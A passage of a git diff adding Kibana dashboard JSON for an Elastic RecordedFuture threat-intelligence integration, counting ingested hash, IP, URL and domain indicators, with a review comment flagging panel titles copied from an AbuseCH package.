"isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "222b3ad0-2e5d-46a0-ae3d-f6a0b15ac2c8", + "layerType": "data", + "legendDisplay": "show", + "legendMaxLines": 5, + "legendSize": "auto", + "metrics": [ + "de0e531b-dda7-461f-9783-3ab9267d202e" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "06b603cb-c9fb-493a-9ca4-e6502ca12054" + ], + "truncateLegend": false + } + ], + "shape": "donut" + } + }, + "title": "File Types [Logs AbuseCH]", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 19, + "i": "2d003143-d3cb-4249-91ae-84ca68d1d8f9", + "w": 26, + "x": 22, + 
"y": 27 + }, + "panelIndex": "2d003143-d3cb-4249-91ae-84ca68d1d8f9", + "title": "Top File Hashes [Logs RecordedFuture]", + "type": "lens" + } + ], + "timeRestore": false, + "title": "[Logs RecordedFuture] Files", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-03-29T11:53:29.110Z", + "id": "ti_recordedfuture-554321f4-a649-49da-a5ce-b3dfef1a179b", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "5aa8cc45-eafb-423a-be69-330e1c9e915f:indexpattern-datasource-layer-b83c382d-fab9-4e60-a632-475e221cc20c", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2e7f1b1e-7c0d-4f0e-b5a3-75f3558b7b23:indexpattern-datasource-layer-85ad73b3-3b76-49f1-ad20-6256b58918f8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "82bffa7f-9796-4815-9256-0cc1d5d89096:indexpattern-datasource-layer-49b7070a-f1d3-46e1-a980-2f6d6d130167", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6d782218-5709-4ead-b236-21ffcc4c207d:indexpattern-datasource-layer-12768311-834b-48d5-8aad-d17d139c2ae5", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "58bb203c-031b-4620-9d66-e4368c65ab52:indexpattern-datasource-layer-12768311-834b-48d5-8aad-d17d139c2ae5", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "fb5eda7b-02e2-4932-bd84-4213cad36a34:indexpattern-datasource-layer-222b3ad0-2e5d-46a0-ae3d-f6a0b15ac2c8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": 
"aad523d7-62c8-42c2-ac5d-76705ffe08d4:indexpattern-datasource-layer-222b3ad0-2e5d-46a0-ae3d-f6a0b15ac2c8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "92307cac-1296-483d-a825-712e98617f14:indexpattern-datasource-layer-689075f1-c5a1-480f-bb28-0e2f1e9a69b5", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2d003143-d3cb-4249-91ae-84ca68d1d8f9:indexpattern-datasource-layer-222b3ad0-2e5d-46a0-ae3d-f6a0b15ac2c8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_b7f6f99b-95d3-44ab-b935-704e307e0dd8:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_6f1ca1c9-a281-458e-bdcf-b21e67546c34:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_50fee1f5-9c14-4620-9c75-f3b91fc6b39f:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "ti_recordedfuture-security-solution-default", + "name": "tag-ref-ti_recordedfuture-security-solution-default", + "type": "tag" + }, + { + "id": "ti_recordedfuture-security-solution-default", + "name": "tag-ref-security-solution-default", + "type": "tag" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/ti_recordedfuture/kibana/dashboard/ti_recordedfuture-57ab05de-cd7e-4779-9201-1e099f7ab23b.json b/packages/ti_recordedfuture/kibana/dashboard/ti_recordedfuture-57ab05de-cd7e-4779-9201-1e099f7ab23b.json new file mode 100644 index 00000000000..e532e6bc73a --- /dev/null +++ b/packages/ti_recordedfuture/kibana/dashboard/ti_recordedfuture-57ab05de-cd7e-4779-9201-1e099f7ab23b.json 
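Review bot: Several embedded objects in this new Files dashboard still carry inner `attributes.title` values copied from another package — `"title": "Files Navigation Textbox [Logs AbuseCH]"`, `"title": "Unique MD5 [Logs AbuseCH]"`, `"title": "File Types [Logs AbuseCH]"` — and the SHA384 and SHA512 metric panels both use the inner title `"Unique TLSH [Logs AbuseCH]"` even though their `sourceField` is `threat.indicator.file.hash.sha384` and `threat.indicator.file.hash.sha512`. The panel-level `title` values are correct so the dashboard renders as intended, but the inner title is presumably what a user sees when opening a panel in the Lens editor or saving it to the library, and the TLSH one is plainly wrong for a SHA hash count. I would align each inner title with its panel title, e.g. `"title": "Unique SHA384 [Logs RecordedFuture]"` and `"title": "Unique SHA512 [Logs RecordedFuture]"`, and replace the remaining `[Logs AbuseCH]` suffixes the same way. Separately, the donut variant of the hash-type breakdown sets all five filter-bucket `label` values to `""` while the bar variant labels them `MD5` through `SHA512`; the legend will presumably fall back to the raw KQL strings, so copying those labels over would make the chart readable.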
@@ -0,0 +1,1008 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"4068d8b6-4d83-43a5-8c28-fcb4dabf8de8\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"4068d8b6-4d83-43a5-8c28-fcb4dabf8de8\",\"fieldName\":\"threat.indicator.provider\",\"title\":\"Provider\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"190ee7fa-a38c-44fb-9112-596894954087\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"190ee7fa-a38c-44fb-9112-596894954087\",\"fieldName\":\"threat.indicator.type\",\"title\":\"Indicator Type\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"65b4761b-de0b-499d-83d4-46ea1eb3d3ac\":{\"type\":\"optionsListControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"65b4761b-de0b-499d-83d4-46ea1eb3d3ac\",\"fieldName\":\"recordedfuture.list\",\"title\":\"Risk List\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}}}" + }, + "description": "Dashboard providing statistics about indicators ingested from the RecordedFuture integration", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "event.dataset", + "negate": false, + "params": [ + "ti_recordedfuture.threat" + ], + "type": "phrases" + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "event.dataset": "ti_recordedfuture.threat" + } + } + ] + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": 
"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", + "key": "event.kind", + "negate": false, + "params": { + "query": "enrichment" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "enrichment" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "params": { + "fontSize": 12, + "markdown": "**Navigation**\n\n**[RecordedFuture Overview (This Page)](/app/dashboards#/view/ti_recordedfuture-57ab05de-cd7e-4779-9201-1e099f7ab23b)** \n[RecordedFuture Files](/app/dashboards#/view/ti_recordedfuture-554321f4-a649-49da-a5ce-b3dfef1a179b) \n[RecordedFuture URLs](/app/dashboards#/view/ti_recordedfuture-ea3dd012-69d8-423d-81b1-2ad9174c75d3) \n\n[Integrations Page](/app/integrations/detail/ti_recordedfuture/overview)\n\n\n**Overview**\n\nThis dashboard is a health overview related to the RecordedFuture integration.\n\nThe dashboard is made to provide general statistics and show the health of the ingestion of indicators from RecordedFuture. 
\n\nIt shows the ingestion rates and provides a few filters for drilling down to specific indicator types retrieved from RecordedFuture.", + "openLinksInNewTab": false + }, + "title": "Overview Textbox [Logs AbuseCH]", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 39, + "i": "8ca50d85-d4a5-4242-97f7-33445484c437", + "w": 7, + "x": 0, + "y": 0 + }, + "panelIndex": "8ca50d85-d4a5-4242-97f7-33445484c437", + "type": "visualization" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-070f5dbc-7687-4e97-9a57-5542b401c13f", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "070f5dbc-7687-4e97-9a57-5542b401c13f": { + "columnOrder": [ + "1e352b49-3b83-44a6-98fe-8703d30f2517" + ], + "columns": { + "1e352b49-3b83-44a6-98fe-8703d30f2517": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Indicators", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "070f5dbc-7687-4e97-9a57-5542b401c13f", + "layerType": "data", + "metricAccessor": "1e352b49-3b83-44a6-98fe-8703d30f2517" + } + }, + "title": "Total Indicators [Logs AbuseCH]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 7, + "i": "f476a486-e306-4906-bf28-30f0c9bd97d8", + "w": 18, + "x": 7, + "y": 0 + }, + "panelIndex": "f476a486-e306-4906-bf28-30f0c9bd97d8", + "title": "Total Indicators [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": 
"indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-1e757dc0-2e6d-4bd2-aa38-7da9133ca960", + "type": "index-pattern" + } + ], + "sharingSavedObjectProps": { + "outcome": "exactMatch", + "sourceId": "ti_abusech-ec1a2c50-3b30-11ec-ae50-2fdf1e96c6a6" + }, + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "1e757dc0-2e6d-4bd2-aa38-7da9133ca960": { + "columnOrder": [ + "66779b74-d127-4249-93e4-b8cd9c39b91f", + "2bbd31c6-4a58-43e5-bab9-de9e7c2d2242" + ], + "columns": { + "2bbd31c6-4a58-43e5-bab9-de9e7c2d2242": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + "66779b74-d127-4249-93e4-b8cd9c39b91f": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of threat.indicator.provider", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "2bbd31c6-4a58-43e5-bab9-de9e7c2d2242", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.provider" + } + } + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "2bbd31c6-4a58-43e5-bab9-de9e7c2d2242" + ], + "layerId": "1e757dc0-2e6d-4bd2-aa38-7da9133ca960", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal", + "showGridlines": false, + "splitAccessor": "66779b74-d127-4249-93e4-b8cd9c39b91f" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right", + "showSingleSeries": false + }, + "preferredSeriesType": "bar_horizontal", + "title": "Empty XY chart", + "valueLabels": "show", + "xTitle": "Providers", + "yLeftExtent": { + "mode": "full" + }, + 
"yRightExtent": { + "mode": "full" + }, + "yTitle": "Count" + } + }, + "title": "Total Indicators per Provider [Logs AbuseCH]", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 19, + "i": "db90358b-9056-45eb-85a3-545631928ee6", + "w": 23, + "x": 25, + "y": 0 + }, + "panelIndex": "db90358b-9056-45eb-85a3-545631928ee6", + "title": "Total Indicators per Provider [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-070f5dbc-7687-4e97-9a57-5542b401c13f", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "070f5dbc-7687-4e97-9a57-5542b401c13f": { + "columnOrder": [ + "1e352b49-3b83-44a6-98fe-8703d30f2517" + ], + "columns": { + "1e352b49-3b83-44a6-98fe-8703d30f2517": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Hash Indicators", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "d0987062-26af-4de8-81d8-15922d36d108", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "ti_recordedfuture.threat" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "ti_recordedfuture.threat" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "threat.indicator.type", + "index": "e7c6d84a-5ade-4c60-9e16-71e8e7a78c2b", + "key": "threat.indicator.type", + "negate": false, + "params": { + "query": "file" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "threat.indicator.type": "file" + } + } + } + ], + 
"internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "070f5dbc-7687-4e97-9a57-5542b401c13f", + "layerType": "data", + "metricAccessor": "1e352b49-3b83-44a6-98fe-8703d30f2517" + } + }, + "title": "Total Indicators [Logs AbuseCH]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 6, + "i": "ed8b8c1e-b34e-44c8-a760-da7fa133cb70", + "w": 9, + "x": 7, + "y": 7 + }, + "panelIndex": "ed8b8c1e-b34e-44c8-a760-da7fa133cb70", + "title": "Total Indicators Hash [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-070f5dbc-7687-4e97-9a57-5542b401c13f", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "070f5dbc-7687-4e97-9a57-5542b401c13f": { + "columnOrder": [ + "1e352b49-3b83-44a6-98fe-8703d30f2517" + ], + "columns": { + "1e352b49-3b83-44a6-98fe-8703d30f2517": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "IP Indicators", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*" + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "threat.indicator.type", + "index": "f983ec32-f684-4057-9ac4-78d6b262a754", + "key": "threat.indicator.type", + "negate": false, + "params": [ + "ipv4-addr", + "ipv6-addr" + ], + "type": "phrases", + "value": [ + "ipv4-addr", + "ipv6-addr" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "threat.indicator.type": "ipv4-addr" + } + }, + { + "match_phrase": { + 
"threat.indicator.type": "ipv6-addr" + } + } + ] + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "d0987062-26af-4de8-81d8-15922d36d108", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "ti_recordedfuture.threat" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "ti_recordedfuture.threat" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "070f5dbc-7687-4e97-9a57-5542b401c13f", + "layerType": "data", + "metricAccessor": "1e352b49-3b83-44a6-98fe-8703d30f2517" + } + }, + "title": "Total Indicators [Logs AbuseCH]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 6, + "i": "53b0c881-386f-4191-ba43-233d69090f78", + "w": 9, + "x": 16, + "y": 7 + }, + "panelIndex": "53b0c881-386f-4191-ba43-233d69090f78", + "title": "Total Indicators IP [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-070f5dbc-7687-4e97-9a57-5542b401c13f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "dc42045c-acfa-4401-98f6-4845bf373eda", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "070f5dbc-7687-4e97-9a57-5542b401c13f": { + "columnOrder": [ + "1e352b49-3b83-44a6-98fe-8703d30f2517" + ], + "columns": { + "1e352b49-3b83-44a6-98fe-8703d30f2517": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "URL Indicators", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + 
"store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "threat.indicator.type", + "index": "dc42045c-acfa-4401-98f6-4845bf373eda", + "key": "threat.indicator.type", + "negate": false, + "params": { + "query": "url" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "threat.indicator.type": "url" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "d0987062-26af-4de8-81d8-15922d36d108", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "ti_recordedfuture.threat" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "ti_recordedfuture.threat" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "070f5dbc-7687-4e97-9a57-5542b401c13f", + "layerType": "data", + "metricAccessor": "1e352b49-3b83-44a6-98fe-8703d30f2517" + } + }, + "title": "Total Indicators [Logs AbuseCH]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 6, + "i": "2ed483bb-680b-42c6-bc08-b1a7dd0ed410", + "w": 9, + "x": 7, + "y": 13 + }, + "panelIndex": "2ed483bb-680b-42c6-bc08-b1a7dd0ed410", + "title": "Total Indicators URL [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-070f5dbc-7687-4e97-9a57-5542b401c13f", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "070f5dbc-7687-4e97-9a57-5542b401c13f": { + "columnOrder": [ + "1e352b49-3b83-44a6-98fe-8703d30f2517" + ], + "columns": { + "1e352b49-3b83-44a6-98fe-8703d30f2517": { + "customLabel": true, + "dataType": 
"number", + "isBucketed": false, + "label": "Domain Indicators", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*" + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "threat.indicator.type", + "index": "6bee0aba-ed41-4a35-ae5f-539e0d317bf1", + "key": "threat.indicator.type", + "negate": false, + "params": { + "query": "domain-name" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "threat.indicator.type": "domain-name" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "d0987062-26af-4de8-81d8-15922d36d108", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "ti_recordedfuture.threat" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "ti_recordedfuture.threat" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "070f5dbc-7687-4e97-9a57-5542b401c13f", + "layerType": "data", + "metricAccessor": "1e352b49-3b83-44a6-98fe-8703d30f2517" + } + }, + "title": "Total Indicators [Logs AbuseCH]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 6, + "i": "4839d945-eaa1-4460-b3ff-af2ba457f7ea", + "w": 9, + "x": 16, + "y": 13 + }, + "panelIndex": "4839d945-eaa1-4460-b3ff-af2ba457f7ea", + "title": "Total Indicators Domain [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-c1cee622-e3dd-4d6b-a28a-0fb19dc2c7b7", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": 
{ + "layers": { + "c1cee622-e3dd-4d6b-a28a-0fb19dc2c7b7": { + "columnOrder": [ + "b7f07f7c-1477-4f83-95f5-ad5cdc3a314b", + "0726d151-9edf-41cb-ab52-473ab27cf8b7" + ], + "columns": { + "0726d151-9edf-41cb-ab52-473ab27cf8b7": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + "b7f07f7c-1477-4f83-95f5-ad5cdc3a314b": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "30s" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "curveType": "CURVE_MONOTONE_X", + "fittingFunction": "Zero", + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "0726d151-9edf-41cb-ab52-473ab27cf8b7" + ], + "layerId": "c1cee622-e3dd-4d6b-a28a-0fb19dc2c7b7", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "b7f07f7c-1477-4f83-95f5-ad5cdc3a314b" + } + ], + "legend": { + "isInside": false, + "isVisible": true, + "legendSize": "auto", + "position": "bottom", + "shouldTruncate": false, + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": false, + "xTitle": "Date", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + }, + "yTitle": "Total Indicators" + } + }, + "title": "Indicators ingested per Datastream [Logs AbuseCH]", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 16, + "i": "00b93348-7c74-4fcd-be77-eadec8257f8f", + "w": 41, + "x": 7, + "y": 19 + }, + "panelIndex": 
"00b93348-7c74-4fcd-be77-eadec8257f8f", + "title": "Indicators ingested timeline [Logs RecordedFuture]", + "type": "lens" + } + ], + "timeRestore": false, + "title": "[Logs RecordedFuture] Overview", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-03-29T11:53:41.335Z", + "id": "ti_recordedfuture-57ab05de-cd7e-4779-9201-1e099f7ab23b", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "f476a486-e306-4906-bf28-30f0c9bd97d8:indexpattern-datasource-layer-070f5dbc-7687-4e97-9a57-5542b401c13f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "db90358b-9056-45eb-85a3-545631928ee6:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "db90358b-9056-45eb-85a3-545631928ee6:indexpattern-datasource-layer-1e757dc0-2e6d-4bd2-aa38-7da9133ca960", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ed8b8c1e-b34e-44c8-a760-da7fa133cb70:indexpattern-datasource-layer-070f5dbc-7687-4e97-9a57-5542b401c13f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "53b0c881-386f-4191-ba43-233d69090f78:indexpattern-datasource-layer-070f5dbc-7687-4e97-9a57-5542b401c13f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2ed483bb-680b-42c6-bc08-b1a7dd0ed410:indexpattern-datasource-layer-070f5dbc-7687-4e97-9a57-5542b401c13f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2ed483bb-680b-42c6-bc08-b1a7dd0ed410:dc42045c-acfa-4401-98f6-4845bf373eda", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": 
"4839d945-eaa1-4460-b3ff-af2ba457f7ea:indexpattern-datasource-layer-070f5dbc-7687-4e97-9a57-5542b401c13f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "00b93348-7c74-4fcd-be77-eadec8257f8f:indexpattern-datasource-layer-c1cee622-e3dd-4d6b-a28a-0fb19dc2c7b7", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_4068d8b6-4d83-43a5-8c28-fcb4dabf8de8:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_190ee7fa-a38c-44fb-9112-596894954087:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_65b4761b-de0b-499d-83d4-46ea1eb3d3ac:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "ti_recordedfuture-security-solution-default", + "name": "tag-ref-ti_recordedfuture-security-solution-default", + "type": "tag" + }, + { + "id": "ti_recordedfuture-security-solution-default", + "name": "tag-ref-security-solution-default", + "type": "tag" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/ti_recordedfuture/kibana/dashboard/ti_recordedfuture-ea3dd012-69d8-423d-81b1-2ad9174c75d3.json b/packages/ti_recordedfuture/kibana/dashboard/ti_recordedfuture-ea3dd012-69d8-423d-81b1-2ad9174c75d3.json new file mode 100644 index 00000000000..0949271fc91 --- /dev/null +++ b/packages/ti_recordedfuture/kibana/dashboard/ti_recordedfuture-ea3dd012-69d8-423d-81b1-2ad9174c75d3.json 
